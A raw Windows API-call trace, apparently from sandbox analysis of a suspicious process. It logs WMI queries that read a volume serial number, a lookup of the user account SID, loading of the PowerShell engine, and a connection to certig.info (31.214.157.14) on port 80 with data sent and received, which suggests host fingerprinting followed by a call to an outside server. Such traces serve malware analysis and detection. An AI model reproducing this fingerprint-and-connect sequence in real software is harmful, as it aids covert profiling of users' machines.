	[0175.211] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cd11720, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec0a8 | out: ppvObject=0x1c6ec0a8*=0x1cd17cf0) returned 0x0
	[0175.212] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd17cf0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebfb0 | out: ppvObject=0x1c6ebfb0*=0x1cd17cf0) returned 0x0
	[0175.212] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd17cf0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec030 | out: ppvObject=0x1c6ec030*=0x0) returned 0x80004002
	[0175.212] WbemDefPath:IUnknown:AddRef (This=0x1cd17cf0) returned 0x3
	[0175.212] CoGetContextToken (in: pToken=0x1c6ebc80 | out: pToken=0x1c6ebc80) returned 0x0
	[0175.212] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd17cf0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebc40 | out: ppvObject=0x1c6ebc40*=0x1b828ae0) returned 0x0
	[0175.213] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b828ae0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebc70 | out: pCid=0x1c6ebc70*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0175.213] WbemDefPath:IUnknown:Release (This=0x1b828ae0) returned 0x3
	[0175.213] CoGetContextToken (in: pToken=0x1c6ebc50 | out: pToken=0x1c6ebc50) returned 0x0
	[0175.213] WbemDefPath:IUnknown:AddRef (This=0x1cd17cf0) returned 0x4
	[0175.213] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd17cf0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebd68 | out: ppvObject=0x1c6ebd68*=0x0) returned 0x80004002
	[0175.213] WbemDefPath:IUnknown:Release (This=0x1cd17cf0) returned 0x3
	[0175.213] WbemDefPath:IUnknown:Release (This=0x1cd17cf0) returned 0x2
	[0175.213] WbemDefPath:IUnknown:Release (This=0x1cd11720) returned 0x0
	[0175.214] WbemDefPath:IUnknown:Release (This=0x1cd17cf0) returned 0x1
	[0175.214] CoGetContextToken (in: pToken=0x1c6ec980 | out: pToken=0x1c6ec980) returned 0x0
	[0175.214] CoGetContextToken (in: pToken=0x1c6ec8c0 | out: pToken=0x1c6ec8c0) returned 0x0
	[0175.214] WbemDefPath:IUnknown:AddRef (This=0x1cd17cf0) returned 0x2
	[0175.214] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd17cf0, riid=0x1c6eca00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ec9e0 | out: ppvObject=0x1c6ec9e0*=0x1cd17cf0) returned 0x0
	[0175.214] WbemDefPath:IUnknown:Release (This=0x1cd17cf0) returned 0x2
	[0175.214] WbemDefPath:IUnknown:Release (This=0x1cd17cf0) returned 0x1
	[0175.214] CoGetContextToken (in: pToken=0x1c6ecb00 | out: pToken=0x1c6ecb00) returned 0x0
	[0175.214] CoGetContextToken (in: pToken=0x1c6eca40 | out: pToken=0x1c6eca40) returned 0x0
	[0175.214] WbemDefPath:IUnknown:AddRef (This=0x1cd17cf0) returned 0x2
	[0175.214] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd17cf0, riid=0x1c6ecb80*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ecb60 | out: ppvObject=0x1c6ecb60*=0x1cd17cf0) returned 0x0
	[0175.215] WbemDefPath:IUnknown:Release (This=0x1cd17cf0) returned 0x2
	[0175.215] WbemDefPath:IUnknown:AddRef (This=0x1cd17cf0) returned 0x3
	[0175.215] WbemDefPath:IWbemPath:SetText (This=0x1cd17cf0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x0
	[0175.215] WbemDefPath:IUnknown:Release (This=0x1cd17cf0) returned 0x2
	[0175.215] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd01390, puCount=0x1c6ecdc0 | out: puCount=0x1c6ecdc0*=0x2) returned 0x0
	[0175.215] WbemDefPath:IWbemPath:GetText (in: This=0x1cd01390, lFlags=4, puBuffLength=0x1c6ecdc0*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecdc0*=0x17, pszText=0x0) returned 0x0
	[0175.215] WbemDefPath:IWbemPath:GetText (in: This=0x1cd01390, lFlags=4, puBuffLength=0x1c6ecdc0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecdc0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0175.215] CoTaskMemAlloc (cb=0x8) returned 0x1b820dc0
	[0175.215] IEnumWbemClassObject:Next (in: This=0x1cd14788, lTimeout=-1, uCount=0x1, apObjects=0x1b820dc0, puReturned=0x1c6ece78 | out: apObjects=0x1b820dc0*=0x0, puReturned=0x1c6ece78*=0x0) returned 0x1
	[0175.241] CoTaskMemFree (pv=0x1b820dc0) 
	[0175.255] CoGetContextToken (in: pToken=0x1c6ecc00 | out: pToken=0x1c6ecc00) returned 0x0
	[0175.255] WbemLocator:IUnknown:Release (This=0x1b849130) returned 0x1
	[0175.255] IUnknown:Release (This=0x1cd14788) returned 0x0
	[0175.311] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd01390, puCount=0x1c6ecf20 | out: puCount=0x1c6ecf20*=0x2) returned 0x0
	[0175.311] WbemDefPath:IWbemPath:GetText (in: This=0x1cd01390, lFlags=4, puBuffLength=0x1c6ecf20*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecf20*=0x17, pszText=0x0) returned 0x0
	[0175.311] WbemDefPath:IWbemPath:GetText (in: This=0x1cd01390, lFlags=4, puBuffLength=0x1c6ecf20*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecf20*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0175.312] IWbemClassObject:Get (in: This=0x1cd14830, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecf10*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf0c*=0, plFlavor=0x1c6ecf08*=0 | out: pVal=0x1c6ecf10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c6ecf0c*=8, plFlavor=0x1c6ecf08*=64) returned 0x0
	[0175.312] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0175.313] IWbemClassObject:Get (in: This=0x1cd14830, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecf20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64 | out: pVal=0x1c6ecf20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64) returned 0x0
	[0175.313] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0175.313] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd01390, puCount=0x1c6ecf20 | out: puCount=0x1c6ecf20*=0x2) returned 0x0
	[0175.313] WbemDefPath:IWbemPath:GetText (in: This=0x1cd01390, lFlags=4, puBuffLength=0x1c6ecf20*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecf20*=0x17, pszText=0x0) returned 0x0
	[0175.313] WbemDefPath:IWbemPath:GetText (in: This=0x1cd01390, lFlags=4, puBuffLength=0x1c6ecf20*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecf20*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0175.314] IWbemClassObject:Get (in: This=0x1cd14830, wszName="__CLASS", lFlags=0, pVal=0x1c6ecf10*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf0c*=0, plFlavor=0x1c6ecf08*=0 | out: pVal=0x1c6ecf10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x1c6ecf0c*=8, plFlavor=0x1c6ecf08*=64) returned 0x0
	[0175.314] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0175.314] IWbemClassObject:Get (in: This=0x1cd14830, wszName="__CLASS", lFlags=0, pVal=0x1c6ecf20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64 | out: pVal=0x1c6ecf20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64) returned 0x0
	[0175.314] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0175.375] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd01390, puCount=0x1c6eceb0 | out: puCount=0x1c6eceb0*=0x2) returned 0x0
	[0175.375] WbemDefPath:IWbemPath:GetText (in: This=0x1cd01390, lFlags=4, puBuffLength=0x1c6eceb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c6eceb0*=0x17, pszText=0x0) returned 0x0
	[0175.375] WbemDefPath:IWbemPath:GetText (in: This=0x1cd01390, lFlags=4, puBuffLength=0x1c6eceb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6eceb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0175.375] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd01390, puCount=0x1c6eceb0 | out: puCount=0x1c6eceb0*=0x2) returned 0x0
	[0175.375] WbemDefPath:IWbemPath:GetText (in: This=0x1cd01390, lFlags=4, puBuffLength=0x1c6eceb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c6eceb0*=0x17, pszText=0x0) returned 0x0
	[0175.375] WbemDefPath:IWbemPath:GetText (in: This=0x1cd01390, lFlags=4, puBuffLength=0x1c6eceb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6eceb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0175.378] IWbemClassObject:GetNames (in: This=0x1cd14830, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c6ecea8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c6ecea0 | out: pNames=0x1c6ecea0*="\x01ƀ\x08") returned 0x0
	[0175.378] SafeArrayGetDim (psa=0x1b831f20) returned 0x1
	[0175.378] IWbemClassObject:Get (in: This=0x1cd14830, wszName="__GENUS", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c6ece9c*=3, plFlavor=0x1c6ece98*=64) returned 0x0
	[0175.379] IWbemClassObject:Get (in: This=0x1cd14830, wszName="__CLASS", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0175.379] SysStringLen (param_1="Win32_Volume") returned 0xc
	[0175.379] IWbemClassObject:Get (in: This=0x1cd14830, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_StorageVolume", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0175.390] SysStringLen (param_1="CIM_StorageVolume") returned 0x11
	[0175.390] IWbemClassObject:Get (in: This=0x1cd14830, wszName="__DYNASTY", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_ManagedSystemElement", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0175.390] SysStringLen (param_1="CIM_ManagedSystemElement") returned 0x18
	[0175.390] IWbemClassObject:Get (in: This=0x1cd14830, wszName="__RELPATH", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0175.390] SysStringLen (param_1="Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x4d
	[0175.390] IWbemClassObject:Get (in: This=0x1cd14830, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c, varVal2=0x0), pType=0x1c6ece9c*=3, plFlavor=0x1c6ece98*=64) returned 0x0
	[0175.390] IWbemClassObject:Get (in: This=0x1cd14830, wszName="__DERIVATION", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b831b60*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b845040, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x1c6ece9c*=8200, plFlavor=0x1c6ece98*=64) returned 0x0
	[0175.401] IWbemClassObject:Get (in: This=0x1cd14830, wszName="__SERVER", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0175.401] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0175.402] IWbemClassObject:Get (in: This=0x1cd14830, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0175.402] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0175.402] IWbemClassObject:Get (in: This=0x1cd14830, wszName="__PATH", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0175.402] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0175.402] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd01390, puCount=0x1c6ecf40 | out: puCount=0x1c6ecf40*=0x2) returned 0x0
	[0175.402] WbemDefPath:IWbemPath:GetText (in: This=0x1cd01390, lFlags=4, puBuffLength=0x1c6ecf40*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecf40*=0x17, pszText=0x0) returned 0x0
	[0175.402] WbemDefPath:IWbemPath:GetText (in: This=0x1cd01390, lFlags=4, puBuffLength=0x1c6ecf40*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecf40*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0175.402] IWbemClassObject:Get (in: This=0x1cd14830, wszName="SerialNumber", lFlags=0, pVal=0x1c6ecf30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf2c*=0, plFlavor=0x1c6ecf28*=0 | out: pVal=0x1c6ecf30*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x1c6ecf2c*=19, plFlavor=0x1c6ecf28*=0) returned 0x0
	[0175.402] IWbemClassObject:Get (in: This=0x1cd14830, wszName="SerialNumber", lFlags=0, pVal=0x1c6ed160*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ed15c*=19, plFlavor=0x1c6ed158*=0 | out: pVal=0x1c6ed160*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9c354b42, varVal2=0x0), pType=0x1c6ed15c*=19, plFlavor=0x1c6ed158*=0) returned 0x0
	[0176.430] GetCurrentProcess () returned 0xffffffffffffffff
	[0176.430] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ecd88 | out: TokenHandle=0x1c6ecd88*=0x4ac) returned 1
	[0176.465] GetCurrentProcess () returned 0xffffffffffffffff
	[0176.465] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c6ecfe8 | out: TokenHandle=0x1c6ecfe8*=0x4b0) returned 1
	[0176.466] GetTokenInformation (in: TokenHandle=0x4ac, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1c6ecfd8 | out: TokenInformation=0x0, ReturnLength=0x1c6ecfd8) returned 0
	[0176.466] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1b831b50
	[0176.466] GetTokenInformation (in: TokenHandle=0x4ac, TokenInformationClass=0x1, TokenInformation=0x1b831b50, TokenInformationLength=0x2c, ReturnLength=0x1c6ecfd8 | out: TokenInformation=0x1b831b50, ReturnLength=0x1c6ecfd8) returned 1
	[0176.577] LocalFree (hMem=0x1b831b50) returned 0x0
	[0176.585] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x1c6ece08, DesiredAccess=0x800, PolicyHandle=0x1c6ece00 | out: PolicyHandle=0x1c6ece00) returned 0x0
	[0176.587] LsaLookupSids (in: PolicyHandle=0x1b831b50, Count=0x1, Sids=0x303a3b0*=0x303a310*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), ReferencedDomains=0x1c6ece90, Names=0x1c6ece88 | out: ReferencedDomains=0x1c6ece90, Names=0x1c6ece88) returned 0x0
	[0176.588] LsaClose (ObjectHandle=0x1b831b50) returned 0x0
	[0176.588] LsaFreeMemory (Buffer=0x1b822d00) returned 0x0
	[0176.589] LsaFreeMemory (Buffer=0x1b829580) returned 0x0
	[0176.751] send (s=0x414, buf=0x303dc20*, len=121, flags=0) returned 121
	[0176.759] recv (in: s=0x414, buf=0x2f9b368, len=502, flags=0 | out: buf=0x2f9b368*) returned 502
	[0176.865] VirtualQuery (in: lpAddress=0x1c6eca60, lpBuffer=0x1c6ed920, dwLength=0x30 | out: lpBuffer=0x1c6ed920*(BaseAddress=0x1c6ec000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6eceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6ece00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6ece00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6ece00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0177.597] CoTaskMemAlloc (cb=0x104) returned 0x1b7dbac0
	[0177.597] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dbac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0177.597] CoTaskMemFree (pv=0x1b7dbac0) 
	[0177.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6ed420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0177.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6ed370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0177.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6ed370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0177.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6ed370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0181.450] CoTaskMemAlloc (cb=0x104) returned 0x1b7dbac0
	[0181.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7dbac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0181.451] CoTaskMemFree (pv=0x1b7dbac0) 
	[0181.605] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4c8
	[0194.467] CloseHandle (hObject=0x4c8) returned 1
	[0194.541] shutdown (s=0x414, how=2) returned 0
	[0194.542] closesocket (s=0x414) returned 0
	[0194.663] CoTaskMemAlloc (cb=0xd) returned 0x1b83a700
	[0194.663] getaddrinfo (in: pNodeName="certig.info", pServiceName=0x0, pHints=0x1c6ecf00*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c6ecef8 | out: ppResult=0x1c6ecef8*=0x1b811320*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="certig.info", ai_addr=0x1b83a780*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) returned 0
	[0195.032] CoTaskMemFree (pv=0x1b83a700) 
	[0195.032] CoTaskMemFree (pv=0x0) 
	[0195.032] FreeAddrInfoW (pAddrInfo=0x1b811320*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="散瑲杩椮普o.info", ai_addr=0x1b83a780*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) 
	[0195.033] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x414
	[0195.033] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4c8
	[0195.034] WSAConnect (in: s=0x414, name=0x30e7b58*(sa_family=2, sin_port=0x50, sin_addr="31.214.157.14"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0195.059] closesocket (s=0x4c8) returned 0
	[0195.525] recv (in: s=0x414, buf=0x3065f58, len=502, flags=0 | out: buf=0x3065f58*) returned 117
